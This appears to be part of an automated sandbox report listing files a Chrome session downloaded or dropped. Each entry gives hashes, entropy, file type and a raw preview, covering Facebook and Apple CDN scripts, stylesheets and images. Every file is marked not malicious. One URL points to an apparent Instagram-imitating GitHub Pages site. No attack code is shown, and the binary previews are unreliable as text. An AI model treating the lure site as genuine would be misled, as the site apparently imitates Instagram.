                                                                                                                                                                                                                                  Preview:RIFF~...WEBPVP8Lr.../?.....m.9..u...PI.J..AC[.E.k.jM.1.U.{..`......_Q.......9.a.H..>x..y.G.d^.l#Ir*....L.k.-.....Bx(.D......!Y...,.. ....p..;A.U...7.{.0O.../.|O.E.s]kF....K....kA...m...ao.)D...N...B..z.l[.m.r..6.}.\..6333..{...aK.%.;....]..8`...Z.%.Q.'.M..-.>&..qm.m#d...Y.m..].m{s.=..$.Vm.-.Rk.cmfff.L..L.-;...y.;.e..i2.....Z-...m/$m.#.T......\..e.m.....m.8m.cOs...B.o.I.........v.t.z....m.m.m.msf.M....m3$i.m.....T.5..e....m.m..m...6..+.......S.eN,....._l.?.~..P+Q.`VK........RD.E.@.@K..lKt.t7...4....0.1...go\.........I......R.!e.c..S..&?.4.0.....R...D.7.D...L ...J:(@g..|W....4.Ml.(K.%.|..6?z...#<...P.Y....qQ.=.9..s.......+....U..5.c.8.%.$.P..+.}@wMs.j.I.&mb....]...^2!.D.e(...`....9.?..?(.'.D.AM..4...JqT.....$........9...6.S.N.*.f...+......=iHD#H.8 4D..3M....?[..Z>....(.`.2.^[..^K.....H2....F...E..j.O..N.S...._......Xy........C.8.p.`.....O.J.PkEe...+..0.Z.,q..!..F....n6......P.]...?ZS....o.HFhe1.p........d(.h&D..D4.J,a=..`2..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):8702
                                                                                                                                                                                                                                  Entropy (8bit):7.956417927660698
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:TfSd8DtTZBu2squcLPxtmC2OjVinln1qyfIw+HB3F5TWD76:L5/NlGOZiVfr+HJen6
                                                                                                                                                                                                                                  MD5:A4A0F7723EA33D4DDB9720848D061F7C
                                                                                                                                                                                                                                  SHA1:DE5AB146AE1A8EB09E0B698F27F7E8992303B3C8
                                                                                                                                                                                                                                  SHA-256:C25077C72ED395A1752632F47B6A65D9BE564267DD388C852EDA513F26C480C7
                                                                                                                                                                                                                                  SHA-512:F458B1C9D2D68BF70DFF9D542A999729DA4A1E41E3546E111A1F56FA0DA0F4ADB55AC942B25BE08683BF6D479B840388AB15BB6EF04DB511B770CAE23A789E19
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/sqiP1qM7wG2bNZxazEogFapaGlhLWbYz_NI9BHCvNEe15mGtC0OYRQKYbdt_yD4pdSM=s64-rw
                                                                                                                                                                                                                                  Preview:RIFF.!..WEBPVP8X........?..?..VP8L.!../?...M(h.FZ........<jb>v..fF. ......W.`...CP..1..D..*r...W..H...r.~,...'ww....H....".....E..K..?.L..Av..{..(.L{..YiA.[.*6.i.....).2...^.=TB..F.#.fY./Go...}{.V>o.]...W.iR].....)..,........W.....<n..J....WU..n.i x .2............$.nq.@...o..hU.F........C..m;.....h.e_6.y]..n...m....$.I......y..mq........J&..4:.<....y......dff....LN..tb+.,...B..HM..8.'.........x.......p.=.{.?5../}......."[............N..RXNII...~.[...;...}..".B.Oim6>....S.?.;X.T.x....?......=..\..^..S.r....b.|...'...p......Nz..^...i..z..i9...@...T......a.|.[m...U..1....b4.+.=.!.x..U"..g.....3E...O!.r. |..X...@..GPDA..a.....|..CJ7p.....%$[..?....?.Y.a.#.thk3...kF?.nfS..v..z.....K=...b,.dwO..\(.|.-.q..2.........$..a].5..q5!!..R@..>Wn...d......>.5..SY.Lr..lY5,..y....._]..B3.H.75y...J..0.......h.'H.u..I.....VM..Et#.......@"H.ZDj....>.Iu=)5..|u.Y..x.S..}..& .5...e.*.s.3OU..uH...>.....%-M.>...P.0@.\...A0.(...A.W..._..f>O.0......^.d..j5..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21057
                                                                                                                                                                                                                                  Entropy (8bit):4.806084471510432
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:E38lrSKuiR7n74LAUo5NtBmUhBeIyY0xHUjU3:q8lrSKuiB74LAUo5NtBmUhBeIyY0xHU0
                                                                                                                                                                                                                                  MD5:E58F2133D9AE2B6F5C8E1CBF56319085
                                                                                                                                                                                                                                  SHA1:0FC4141498E8486FDAA29F4D57FE89E9A4EC56F9
                                                                                                                                                                                                                                  SHA-256:DBA40B09DD034C3C9483680AF24BDDDEC7B910E3CBB6F908BCBF8552F8C7819D
                                                                                                                                                                                                                                  SHA-512:F738972BBC413C68FA88693B9DD885BEDE49278A37DF1D224E058FE50BE0CC20F9E129D871D40E5E2F5BFF266111E8873D305A3B559B2A9A22EAB06C57A47826
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:[{"id":"3d39a8ff","name":"apple","analyticsAttributes":[{"name":"data-analytics-title","value":"apple home"}]},{"id":"a5e87de9","name":"mac","baseGroups":[{"id":"5bdb085b","title":"More from Mac","analyticsAttributes":[{"name":"data-analytics-region","value":"more from mac"}],"baseLinks":[{"analyticsAttributes":[{"name":"data-analytics-exit-link","value":"true"},{"name":"data-analytics-title","value":"mac support"}],"text":"Mac Support","url":"https://support.apple.com/en-uz/mac?cid=gn-ols-mac-psp-prodfly","ariaLabel":"","id":"c07886de"},{"analyticsAttributes":[{"name":"data-analytics-title","value":"continuity"}],"text":"Continuity","url":"/uz/macos/continuity/","ariaLabel":"","id":"b204e51d"},{"analyticsAttributes":[{"name":"data-analytics-title","value":"icloud+"}],"text":"iCloud+","url":"/uz/icloud/","ariaLabel":"","id":"51c89dd2"},{"analyticsAttributes":[{"name":"data-analytics-title","value":"mac for business"}],"text":"Mac for Business","url":"/uz/business/mac/","ariaLabel":"","
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:C source, ASCII text, with very long lines (4181)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24223
                                                                                                                                                                                                                                  Entropy (8bit):5.429094862367194
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:wY4WrsTBXoWi8zyzso+nyQNZF13js4WHidus8XJqFWVzlP9wQ:f4WITB4WB4+/j1c7X4WVzlP99
                                                                                                                                                                                                                                  MD5:4921AD7DB0310614641D131B883C33E5
                                                                                                                                                                                                                                  SHA1:0126DE249CBA43DA8FA067523F4F21A71E5A3422
                                                                                                                                                                                                                                  SHA-256:1F5E1C160B83087F12390614A70918A5518E634A39DB64FE9AF47E4E487A358B
                                                                                                                                                                                                                                  SHA-512:1DEFA4012FE8C722FD76E7AEF8B13D54B45FEFC7A5A25EDC02E210A04957F3C387DC5BFBE99FE2F911DE797497E789FD8C0D0C8ACDE812A7EE7E558BF60224EF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("forEachObject",[],(function(a,b,c,d,e,f){"use strict";var g=Object.prototype.hasOwnProperty;function a(a,b,c){for(var d in a){var e=d;g.call(a,e)&&b.call(c,a[e],e,a)}}f["default"]=a}),66);.__d("BasicVector",[],(function(a,b,c,d,e,f){a=function(){function a(a,b){this.x=a,this.y=b}var b=a.prototype;b.derive=function(b,c){return new a(b,c)};b.toString=function(){return"("+this.x+", "+this.y+")"};b.add=function(a,b){b===void 0&&(b=a.y,a=a.x);a=parseFloat(a);b=parseFloat(b);return this.derive(this.x+a,this.y+b)};b.mul=function(a,b){b===void 0&&(b=a);return this.derive(this.x*a,this.y*b)};b.div=function(a,b){b===void 0&&(b=a);return this.derive(this.x*1/a,this.y*1/b)};b.sub=function(a,b){if(arguments.length===1)return this.add(a.mul(-1));else return this.add(-a,-b)};b.distanceTo=function(a){return this.sub(a).magnitude()};b.magnitude=function(){return Math.sqrt(this.x*this.x+this.y*this.y)};b.rotate=function(a){return this.derive(this.x*Math.cos(a)-this.y*Math.sin(a),
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (563)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):582
                                                                                                                                                                                                                                  Entropy (8bit):5.204232886763647
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:zXJnCMA7Qx+6oFACVQPI4RoJLQPIYKcAaZq9VsxI0LWYcNq50SfnUwLQg5jQW:LRCMxVqF6PIHkPIY2eq9VsCyWROUwLQe
                                                                                                                                                                                                                                  MD5:A57F69DD143794030B4FAB18E1F76810
                                                                                                                                                                                                                                  SHA1:851B709612FC28473A8F3A85EB769207D01C025B
                                                                                                                                                                                                                                  SHA-256:4F591A9B5C7C1C49F52DBF405E39B5305C28DA1D4E607B50DD118FEE3635A599
                                                                                                                                                                                                                                  SHA-512:FF46BD59AE8511E93855E656EF7D6B74DDD8F83EA2A0B72381B9962ED9835624F1AEF111A0A898BFDA3D85CF41A6BD74F095D13C1DE98E1E6A2E3341B50AD857
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdsDataAtomDebugger",["URI"],(function(a,b,c,d,e,f){"use strict";var g,h={shouldLog:!!new(g||b("URI"))(window.location.href).getQueryData().dispatcherevents,toggleLogging:function(){h.shouldLog=!h.shouldLog},isLogging:function(){return h.shouldLog},attach:function(a){a.register(function(a){a=a.action;if(a){console.timeStamp&&console.timeStamp(a.type);if(h.shouldLog){var b=a.type,c=a.actionType;a=babelHelpers.objectWithoutPropertiesLoose(a,["type","actionType"]);console.groupCollapsed(b||c,a);console.trace();console.groupEnd()}}})}};e.exports=h}),null);
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):157537
                                                                                                                                                                                                                                  Entropy (8bit):5.450896766346486
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:VcQ2UlYdxMXwcK2Bg6mqBhHPVy/ynVmXeXWH2H3i47UW4nb00pqpIReMaahQYg5U:f1mhfaahWIhsMkVT+BTtdOaBrdD
                                                                                                                                                                                                                                  MD5:E8E8B7A18F4EBDA24A25F702B22FA5C1
                                                                                                                                                                                                                                  SHA1:45DF73C1E3A0A3221A36654FCC46250E31D44C3C
                                                                                                                                                                                                                                  SHA-256:B740DD04F5C2A05AC983F4716999989B7A05B48C7E4717F77729B3DF19E97E3C
                                                                                                                                                                                                                                  SHA-512:57098BD96ADF38227E5B3C05CB1C715A9207F0BD4B198E3CF2B2A654D020BA3E0D65D04614F041E4291C86D928AB290619319C8C27F54D4563CBE71779568030
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:(function(mt){typeof define=="function"&&define.amd?define(mt):mt()})(function(){"use strict";function mt(e,t){return t.forEach(function(s){s&&typeof s!="string"&&!Array.isArray(s)&&Object.keys(s).forEach(function(n){if(n!=="default"&&!(n in e)){var a=Object.getOwnPropertyDescriptor(s,n);Object.defineProperty(e,n,a.get?a:{enumerable:!0,get:function(){return s[n]}})}})}),Object.freeze(Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}))}var Ye,M,ss,ns,Je,is,as,dt={},os=[],Pn=/acit|ex(?:s|g|n|p|$)|rph|grid|ows|mnc|ntw|ine[ch]|zoo|^ord|itera/i;function we(e,t){for(var s in t)e[s]=t[s];return e}function rs(e){var t=e.parentNode;t&&t.removeChild(e)}function Xe(e,t,s){var n,a,i,l={};for(i in t)i=="key"?n=t[i]:i=="ref"?a=t[i]:l[i]=t[i];if(arguments.length>2&&(l.children=arguments.length>3?Ye.call(arguments,2):s),typeof e=="function"&&e.defaultProps!=null)for(i in e.defaultProps)l[i]===void 0&&(l[i]=e.defaultProps[i]);return et(e,l,n,a,null)}function et(e,t,s,n,a){var i={type:e,props:
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (64911)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):159823
                                                                                                                                                                                                                                  Entropy (8bit):5.360552525801775
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:Qn0LW284gFw6lgZKGj6w9lzL6w1lKPquN2TFOkw6l7cjCYpDb:Qn0LWwLgP5N2JXcjCYpH
                                                                                                                                                                                                                                  MD5:2EFEBD43F4E83C7A2A0DE88076553102
                                                                                                                                                                                                                                  SHA1:282DCD7549F99F8465ED2147786886EA74C11652
                                                                                                                                                                                                                                  SHA-256:494046D00B8B50FB5CF0992A22FC67134BD10FE701968ACDB817205DA873CCE4
                                                                                                                                                                                                                                  SHA-512:1954B77148CB23E0CFA5C1A7CB8AF2BD771F1F2CD27140C9D1C46EA45CF48492D9E91CB3903C920B34DD9EFC46A991E7D5F4DC41F61BEF71BBE3646C17AD6E45
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-6923b857.js
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{c as t,a as n}from"./p-2649b6ee.js";import{s as e,f as i}from"./p-bb5da73d.js";import{u as r}from"./p-9d409825.js";import{j as o}from"./p-e6747c77.js";import{n as s}from"./p-a0c067db.js";var u=t((function(t,n){Object.defineProperty(n,"__esModule",{value:!0}),n.camelize=void 0,n.camelize=t=>t.toLowerCase().replace(/[^a-zA-Z0-9]+(.)/g,((t,n)=>n.toUpperCase()))})),a=t((function(t,n){function e(t,n){return Object.prototype.hasOwnProperty.call(Object
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (381)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):925
                                                                                                                                                                                                                                  Entropy (8bit):5.223022542169909
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:u6oTTlrIYevhTuKtLG0MAWB6QeJRFrnDXvjV:upnlrpevhTuAG9AWWRFDDXvjV
                                                                                                                                                                                                                                  MD5:E19C18502A12FDADA7F86888071328EA
                                                                                                                                                                                                                                  SHA1:02203C7A7AA0B3FEFD4EC5179C5C1E6B6784B0C8
                                                                                                                                                                                                                                  SHA-256:7AC6A1D9656FE05495E01D58E9C5823473A46347F9A7A23770915C1DD32E4CC1
                                                                                                                                                                                                                                  SHA-512:4BEABBE238270C0ECB7C09310B143647D0B21D465059ED9FD63FFD27D5EEC80EEA23D4C1EC095E5665230C87479206D234817C83F44CBBB864B684E5043CB0CA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-e6747c77.js
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.const r=/([bptsq]){1}:(rgb\([\d,]+)\)/g,t={b:"backgroundColor",p:"primaryTextColor",s:"secondaryTextColor",t:"tertiaryTextColor",q:"quaternaryTextColor"};function o(o){if("string"!=typeof o)return{};const e=o.match(r);return e?e.map((r=>r.split(":"))).reduce(((r,o)=>{const[e,n]=o;r[t[e]]=n;const s=n.substring(4,n.length-1);return r[`${t[e]}RGBValues`]=s,r}),{}):{}}export{o as j}
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 306 x 90, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):3754
                                                                                                                                                                                                                                  Entropy (8bit):7.891960792073307
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:pVR8tAXdv46Nbd/o5AQ1MyzREs9wrTirdu:/RfvjNJQ5AJUEsVo
                                                                                                                                                                                                                                  MD5:4B70F6FAE44727678540B68E876908B1
                                                                                                                                                                                                                                  SHA1:D5A23520ACDF18636380E1A88D3DE2A1EFBF6CE1
                                                                                                                                                                                                                                  SHA-256:14C09561486BA385A8A62BC0A8B41E03638A6334648113A7F28BE47271ECCB5E
                                                                                                                                                                                                                                  SHA-512:F00497BBF393F680C0352C4485E74FC7519557EC6DAE6FEDEEB206B094AC849C1FBCCD62DD5943FC8B40247245065FD81E170846BC0DA8A3FC33E332352EC7C3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://sayidanur.github.io/instagram.com/img/apple-button.png
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...2...Z.......*t....PLTE.........................................................ccc...............777mmm.........rrr......\\\.........)))...KKK...222.........@@@......$$$......bbb.........kkk000```........FFF........[[[PPPhhh............"""...:::......YYYppp555'''... {{{...~~~......HHH...VVV............yyy......................SSSuuu.............xxx...999...MMM___fff.........%%%.........<<<BBB+++444>>>........+....%tRNS.,......} .......H..........8........lO,.....IDATx...K..@....tq.A.u@.Q.u.....Xig..Kj..R.....}..-..IRg....b.[....V..ls.;k.X[.......5...8...F..;f.Q..tBv..U.......VotE(...F7Db.7j`.P....~2&c...r..woOi.....}.{...G...B4.a.D.W..g..%.X.S=WD.V.Zm....!$.@4.v.5.......mx.b&..u..3......(....+..o2......7....!...S.a<.O.P....;.I#.....c..w..$.~A2y...XI695=3. ._G.7...A.Y..-%.C...h.H6..?Y.u.'C....R.=....O$2.`!2..%...S.E.M48V......<.,.G....Y.0..Z.L....~/..any`...H.+.H,.l.g-,A#.....~R2..s>..d...`x.Y.2.nr..8{..s...ry...,.......}..:..>.%[8`VT.0Lv.H&.a
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4284)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):21931
                                                                                                                                                                                                                                  Entropy (8bit):5.419955785131785
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:dt4lGr5R+DJ0QZjYcfyVgBuR0PLQey7mRvYEuLiL9CQRDH6:dt9lszXZJNRL6
                                                                                                                                                                                                                                  MD5:06B55DE1E2F0ECDAF844BD6C74714273
                                                                                                                                                                                                                                  SHA1:980117DB0563CA749CA31AE9E927374CAA4D729F
                                                                                                                                                                                                                                  SHA-256:43D073D5228C0D204C23075BEFD16BF841120039AD37FEEB489EF62783EE6278
                                                                                                                                                                                                                                  SHA-512:692C1BF38DE4B4CA01F33C754019DBFEF9EC8F8833BA48064ED12F606E65E80479CDC8378B7C211136E44BFA32C69FBF615FAAC9B2566DBF0934260EBBC1F451
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yN/l/0,cross/S60_mKfvulW.css"
                                                                                                                                                                                                                                  Preview:._5_my{display:inline-block;min-height:10px;min-width:10px;width:100%}._68qf:before{background:#373737;color:#fff;content:'Wait Time';font-size:8px;padding:0 1px;pointer-events:all;position:absolute;z-index:2}.._28hn{display:inline-block;width:100%}._4ez8{outline:1px solid #fa3e3e}._28ho{outline:1px solid #42b72a}.._9l2i ._9l2g,._9l2i ._1yv{border-radius:6px;box-shadow:0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);width:565px!important}._9l2i ._4t2a,._9l2i ._9l18{background-color:transparent}._9l2i ._9l19,._9l2i ._9l1d{box-sizing:border-box;margin:auto;width:565px}._9l2i ._9l1d ._9l16,._9l2i ._9l16{background-color:#fff;border-bottom:none;padding:18px 16px}._9l2i ._9l16 .clearfix{align-items:center;display:flex;justify-content:space-between}._9l2i ._9l16 .clearfix::after{display:none}._9l2i ._9l16 ._9l17{font-size:20px;line-height:24px}._9l2i ._9l16 ._9l15,._9l2i ._9l16 ._9l15:hover{background-color:#e4e6eb;background-image:url(/rsrc.php/v3/yn/r/J-J3z0h9x9f.png);background-
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39178
                                                                                                                                                                                                                                  Entropy (8bit):7.986263648230382
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:pkXIlvy3Jmdf7NDnfY4zGDgyOk1Qfdo/5IMVr2deM16QXEoX+ncl/qtEXEWL:pIECy7dfY4zGMyObfdo/5jmLXEm+nK/1
                                                                                                                                                                                                                                  MD5:CD2CF2DBFA12E22A6C553016D2913637
                                                                                                                                                                                                                                  SHA1:A94119AAA47E7A27CA8D104E15AABD04B33354B6
                                                                                                                                                                                                                                  SHA-256:2D4A8FCE6CF39A05B6EC8EC5054E1BD7A236B4767763D0E81333EE768F8D4E4F
                                                                                                                                                                                                                                  SHA-512:30012A778ECF9F3D349A0B42D0D7F67A22992DAD7BCAD5B81D9B04F6FBD7B7A82BCA15511A0430D115AB236F6190A78019F4C172CF18855670FAC0AED8E88304
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../..2.M@r.H.$.1kD.....Y......?.../.E.>|.kTuH.v.m.[.#...:..vw.tkn..d..s.Pw..#I....n.,...1E.C....9"..'.#mo.....v.cYy.v.]y{...0.Hy..*....fM..._.k..@..X-..k8.........0S..@R+P...HR.6...|E.....b./0p.........I......0..;"...J..o...DIU.Z....$..J.\.%...o9U..!...%..Dkd}QD9..z@..W.#.s].".4...m.n.d.<.A.W..."3......3.#.v.....6~..x...oBx..T.$IRU%.....E.......K.X.?....R.((.........!. ....Q...............=.....`X..=J..LXJ.@A.e.oi"..E.2... .![..&....V)......"C8.*.....cD...|K$...X.(.......b..D"..JN..(.c...u...(.B..aTX..1...0....0.(..bx5.=..!..B[..e.z./.uz...Z.............f..f..@((.*...@..p......M....J.....|.......o..ed......2.....Kk.v./.S..+4oo.#J.Bs.b..k....u....!....%,1x..X..>...j;.......@.J.`..8.?.z?...cD>B...Fn.F....z..t.sDL...:....{.~......fL..$.....e:........hL ....t.x.Cm...J..PYIu..$#.B.....`.d$..4.T..-@.g......H..Y.6..Y......c.u...o.............efff..3/..x.s.{.{^W.'.:..u.....]....<Ex...4Z.Z.d..[X...U..W!...2..\..-.%WKV...*d-V.W.Z.Y.9.-V.+Y[.FaZrR-..S
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65359)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):200589
                                                                                                                                                                                                                                  Entropy (8bit):5.379175388908165
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:vd3wWLstPIEovvdQfaPvQmfIiBSQZWc1APF3SDRns71iMw8F6Oum19udpz9/VgDc:V3wIvLvLwDXYn6L9C/G89Y357C
                                                                                                                                                                                                                                  MD5:EE1AC470ECB79FEFCFA9EC4B52BA85DC
                                                                                                                                                                                                                                  SHA1:15F59D28D417ECA124A7218466D45650D52EDD31
                                                                                                                                                                                                                                  SHA-256:D415BBD88F59C56CB18AD305E006B0ECE3A2B5902504F66F4B07252812C5FBF1
                                                                                                                                                                                                                                  SHA-512:B23FF3B718A765D52158571E59DF01B0AD5CA375930663116E2D30060C267BFB921372E85A745DFDFE0BFACB72C4D6334F4254694FFE1D2594FB97B09CB4AB9E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/y2/r/0uUeXNz0Xos.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ReactFiberErrorDialog",["cr:8909"],(function(a,b,c,d,e,f,g){"use strict";function a(a){return b("cr:8909").showErrorDialog(a)}g.showErrorDialog=a}),98);.__d("ReactDOM-prod.classic",["EventListener","Promise","ReactFeatureFlags","ReactFiberErrorDialog","react","scheduler"],(function(d,e,f,g,h,i){"use strict";var j,k,l=j||e("react"),m=Object.assign;function n(d){var e="https://react.dev/errors/"+d;if(1<arguments.length){e+="?args[]="+encodeURIComponent(arguments[1]);for(var f=2;f<arguments.length;f++)e+="&args[]="+encodeURIComponent(arguments[f])}return"Minified React error #"+d+"; visit "+e+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var o=e("ReactFeatureFlags").alwaysThrottleRetries,p=e("ReactFeatureFlags").disableDefaultPropsExceptForClasses,q=e("ReactFeatureFlags").disableLegacyContextForFunctionComponents,r=e("ReactFeatureFlags").disableSchedulerTimeoutInWorkLoop,s=e("ReactFeatureFlags").ena
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 395x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17070
                                                                                                                                                                                                                                  Entropy (8bit):7.988317321389732
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:wOHhhNqlo9N9XwqApqnM4040og7PlW0JQLa+X:wYNiol1443QR2pX
                                                                                                                                                                                                                                  MD5:C019051EE1A7C6FB5FC8B600A0DA1C1E
                                                                                                                                                                                                                                  SHA1:2978F635256666B167EBF7E3687AA82CD25EF9AD
                                                                                                                                                                                                                                  SHA-256:17DF26601D1C695DAD42B960143B0830B9DA296356D0B0997CC910F40AE363C3
                                                                                                                                                                                                                                  SHA-512:3C392A3FE58032E38143043CC216593650014CF9B571BFCF76890133FC408113FE9AC83AF81F8649FF9D69FBEA19C2A8C8CE3CD562B53F2BD7649BCB20D12BF3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.B..WEBPVP8 .B.......*..(.>M .E".!... (..o..Q.....Mo...e..y....t.._c....Og..?....g.....?......l...v.E~..........}...7.../M/d..Oa...M..O..._.l}...{.........Z..........?p.........a.3..._..t?.....^....G.O...[.7%..z.{.......y..|S....N.............o.?]..j..3.............'}U...?.w._....~Q|.{...........0.....],88.D.C@.L~.......V ..3._zP.....Z....o|_p^..a.7..K.w..C..F... D....]....f.z,....9...............sFD..7.}\9.[.].E..*..9......O.M........".lrG...rz...).r.m.../.K5.......q....l...]F...@-k..Z*.........S....1@}-...XB..."I.d. S-.L..%V.H....!D.+...T..z[i..K.g...".h?.Ac.5G!.}.a.G...b..-M.x[l..2...O..1.+...N.....v..#z-....G.O.nP.Q..w.2(....s....=.G.oOg..v.-.+V,e.....6R..).....7.!:O.:L.M.....{=.6.........1..Ii.....}M...,.Y.kz.+.\.&)....e.pq.j...Q4:....6r.Y...is..R.......d.....BO.......]%;6S..NCQ.Z...+.$....~...W...c.V....+B1.}..9.....?D*g...W[.S..'....K....... .B..T9o....s9..Mb...tg...y.:.l....Q..&...<L=.].FE..>..0?m....Q)3EM.....?}......<....FJ..=
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):337
                                                                                                                                                                                                                                  Entropy (8bit):5.144404685488444
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnQYZojYAuGNG/QVI32TKhiRANMwQRaNw6JpyxZRNlad0:kRZTFfZOI/AIGoiukbRN20
                                                                                                                                                                                                                                  MD5:D03BC53CDB48C0376A23B20D1EF421E3
                                                                                                                                                                                                                                  SHA1:245303874D8525008CCE05DF43682A7B7FB70D26
                                                                                                                                                                                                                                  SHA-256:D96BE73454C76FD9EDBE8D1BA4F10C894C6BFA723730606E03013D7EAE47C66D
